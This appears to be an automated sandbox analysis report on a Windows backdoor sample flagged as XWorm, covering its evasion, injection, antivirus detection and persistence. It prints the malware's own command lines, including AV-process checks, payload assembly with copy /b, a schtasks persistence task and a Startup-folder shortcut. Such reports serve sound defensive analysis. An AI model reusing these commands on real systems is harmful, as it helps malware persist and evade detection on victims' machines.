Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Uses ping.exe to sleep

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1			Jump to behavior

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 2B70000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 2D10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Memory allocated: 4D10000 memory reserve \| memory write watch

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Window / User API: threadDelayed 5579

Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Northeast

Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

API coverage: 4.9 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528	Thread sleep count: 5579 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif TID: 1528	Thread sleep time: -55790s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Thread sleep count: Count: 5579 delay: -10

Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00406850 FindFirstFileW,FindClose,	0_2_00406850
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Code function: 0_2_00405C26 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C26
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_004AE472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004AD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004AD921
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004ADC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_004ADC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_004BA1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004BA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_004BA570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_0047C622 FindFirstFileExW,	11_2_0047C622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B66DC FindFirstFileW,FindNextFileW,FindClose,	11_2_004B66DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B7333 FindFirstFileW,FindClose,	11_2_004B7333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_004B73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_004B73D4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior

Source: Telecom.pif, 0000000B.00000002.2443431960.0000000003ABB000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Process queried: DebugPort

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004BF4FF BlockInput,

11_2_004BF4FF

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_0044338B

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00445FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

11_2_00445FC8

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00465058 mov eax, dword ptr fs:[00000030h]

11_2_00465058

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A20AA GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,

11_2_004A20AA

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00472992 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00472992
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460BAF IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00460BAF
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460D45 SetUnhandledExceptionFilter,	11_2_00460D45
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Code function: 11_2_00460F91 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00460F91

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: E30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Memory written: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe base: D7D000			Jump to behavior

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004A1B4D

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0044338B GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

11_2_0044338B

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004ABBED SendInput,keybd_event,

11_2_004ABBED

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004AEC6C mouse_event,

11_2_004AEC6C

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cutting Cutting.bat & Cutting.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 23855	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Northeast + Cameras + Papers + Friends + Fears + Commander + Tramadol + Plugins 23855\Telecom.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Stream + Keyboard 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif 23855\Telecom.pif 23855\R	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Impaired" /tr "wscript //B 'C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.js'" /sc minute /mo 3 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif "C:\Users\user\AppData\Local\EcoVision Dynamics\EcoScape.pif" "C:\Users\user\AppData\Local\EcoVision Dynamics\A"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & echo url="c:\users\user\appdata\local\ecovision dynamics\ecoscape.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\ecoscape.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

11_2_004A14AE

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_004A1FB0 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

11_2_004A1FB0

Source: Telecom.pif, 0000000B.00000003.1222451762.00000000044C9000.00000004.00000800.00020000.00000000.sdmp, Telecom.pif, 0000000B.00000002.2438041128.0000000000503000.00000002.00000001.01000000.00000006.sdmp, EcoScape.pif, 00000013.00000002.1246780607.0000000000503000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Telecom.pif	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_00460A08 cpuid

11_2_00460A08

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0049E5F4 GetLocalTime,

11_2_0049E5F4

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0049E652 GetUserNameW,

11_2_0049E652

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\23855\Telecom.pif

Code function: 11_2_0047BCD2 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

11_2_0047BCD2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Backdoor.Win32.Agent.myuvwd.30967.9402.exe

0_2_0040350A

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\cmd.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477626000.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475846355.0000000004544000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475792127.0000000003AE1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2437824814.0000000000E32000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477657336.000000000455C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004514000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1477695668.000000000453D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2443989987.0000000004526000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Telecom.pif PID: 6936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 1180, type: MEMORYSTR

OS version to string mapping found (often used in BOTs)

Source: Telecom.pif	Binary or memory string: WIN_81
Source: Telecom.pif	Binary or memory string: WIN_XP
Source: Commander.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Telecom.pif	Binary or memory string: WIN_XPe
Source: Telecom.pif	Binary or memory string: WIN_VISTA
Source: Telecom.pif	Binary or memory string: WIN_7
Source: Telecom.pif	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 34.2.RegAsm.exe.e30000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.Telecom.pif.4552c30.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.4552c30.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.454d480.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.3.Telecom.pif.3ae5b58.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1477719866.000000000454A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1475822561.0000000004557000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
